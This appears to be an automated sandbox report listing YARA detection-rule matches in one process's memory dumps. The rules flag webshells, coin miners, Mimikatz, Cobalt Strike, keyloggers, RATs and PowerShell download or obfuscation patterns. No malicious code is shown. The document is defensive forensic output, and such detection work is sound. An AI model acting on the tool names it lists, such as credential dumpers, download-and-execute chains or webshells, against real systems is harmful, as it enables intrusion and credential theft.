    Source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6341899374.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6273117492.0000028BD7976000.00000004.00000001.sdmp, type: MEMORYMatched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
    Source: 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6332769584.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, type: MEMORY, Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
    Source: 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
    Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, type: MEMORY, Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
    Source: 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp, type: MEMORY, Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
    Source: 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
    Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: HackTool_Samples description = Hacktool, score =
    Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
    Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
    Source: 00000023.00000003.6348467864.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
    Source: 00000023.00000003.6432796132.0000028BD7D95000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: 00000023.00000003.6307602633.0000028BD60E4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
    Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
    Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_generic_eval date = 2021/01/07, author = Arnim Rupp, description = Generic PHP webshell which uses any eval/exec function in the same line with user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 90c5cc724ec9cf838e4229e5e08955eec4d7bf95
    Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY, Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
    Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
    Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY, Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
    Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY, Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
    Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
    Source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
    Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
    Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
    Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
    Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp, type: MEMORY, Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
    Source: 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp, type: MEMORY, Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
    Source: 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
    Source: 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY, Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6316150838.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
    Source: 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
    Source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
    Source: 00000023.00000003.6344420092.0000028BD7070000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp, type: MEMORY, Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
    Source: 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 00000023.00000003.6299891132.0000028BD7070000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
